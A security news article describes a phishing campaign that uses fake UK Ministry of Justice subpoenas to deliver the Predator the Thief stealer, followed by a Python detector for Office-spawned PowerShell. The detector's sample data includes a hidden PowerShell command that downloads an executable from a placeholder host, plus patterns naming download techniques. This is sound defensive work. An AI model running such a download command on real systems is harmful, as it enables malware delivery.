A new phishing campaign has been detected that uses subpoenas from the UK Ministry of Justice as a lure to get users to click a link that triggers the download of a malicious Word document that installs the Predator the Thief information stealer.
As with countless other phishing campaigns, the emails use fear and urgency to get users to take action. The emails appear to have been sent from a Ministry of Justice email account, include the Ministry of Justice seal, and contain a plausible threat.
The embedded hyperlink has the text “use this link for further information” and the recipient is told to click the link to find out about the documents that must be prepared for an upcoming court appearance. To add urgency, the emails state that notice must be provided within 14 days of receiving the email, and that the court case will proceed regardless of whether the individual attends.
While the emails appear to be genuine at first glance, there are signs that all is not what it seems. Notably, in addition to claiming to have been sent by the Ministry of Justice, the emails mention the Department of Justice.
The hyperlink in the email directs the user to Google Docs and then to OneDrive, where the download of a Word document is triggered. The document contains a macro which launches a PowerShell command that triggers the silent download of the information stealer payload. Predator the Thief is provided under the malware-as-a-service model and includes a builder and C2 panel. Affiliates using the malware are also offered support services to help them conduct their campaigns.
The malware can take screenshots and steal system information along with a range of sensitive data including documents, cryptocurrency wallets, browser cookies, and VPN and FTP credentials. All stolen data is sent back to the C2 via HTTP POST requests. To evade detection, once information has been stolen, the malware performs a clean-up and exits, which makes it harder for security teams to identify a data breach.
The phishing scam was discovered by security researchers at Cofense, who believe the campaign is the work of a relatively inexperienced threat actor, most likely based outside the United Kingdom.
The use of a hyperlink to Google Docs may be enough to bypass some email security solutions, as the site is legitimate and has a relatively high trust score. Further, the malware download does not occur on that first site, but on a second site that also has a high trust score.
In addition to clicking the link, the user would then need to open the document and enable macros. Through security awareness training, users can be prepared for this type of scam and instructed never to use links in unsolicited emails or to enable macros on documents. Endpoint security solutions that conduct a memory analysis may also be able to identify the PowerShell execution and block the attack.
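The Office-to-PowerShell step in the chain above, which the endpoint detection mentioned in the last paragraph relies on, shows up in process-creation telemetry as an Office application spawning a script host. The following is an added example (not Cofense's or any vendor's code) that scores constructed EDR-style events; the indicator patterns, labels and threshold are assumptions.

```python
import re

# Office applications whose child processes are worth scrutinising.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a silent download stage (labels are assumptions).
DOWNLOAD_HINTS = {
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer": "download_cmdlet",
    r"-w(indowstyle)?\s+hidden": "hidden_window",
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}": "encoded_command",
    r"https?://": "url_in_cmdline",
}

def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event):
    """Return (score, reasons): 0 unless an Office app spawned a script host."""
    parent, child = _basename(event["parent_image"]), _basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return 0, []
    reasons = [f"{parent} spawned {child}"]
    cmd = event.get("command_line", "")
    for pattern, label in DOWNLOAD_HINTS.items():
        if re.search(pattern, cmd, re.IGNORECASE):
            reasons.append(label)
    return len(reasons), reasons

def find_suspicious(events, threshold=2):
    """Keep events scoring at least `threshold` (Office->script host plus one hint)."""
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"pid": ev["pid"], "score": score, "reasons": reasons})
    return findings

# Constructed sample events (not real telemetry); the second mirrors the described chain.
SAMPLE_EVENTS = [
    {"pid": 4100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "command_line": "WINWORD.EXE /n"},
    {"pid": 4312, "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.exe','p.exe')"},
    {"pid": 4500, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_EVENTS))
```

The benign Word launch and the administrator's cmd-spawned PowerShell score 0, so only the macro-driven hidden download is reported.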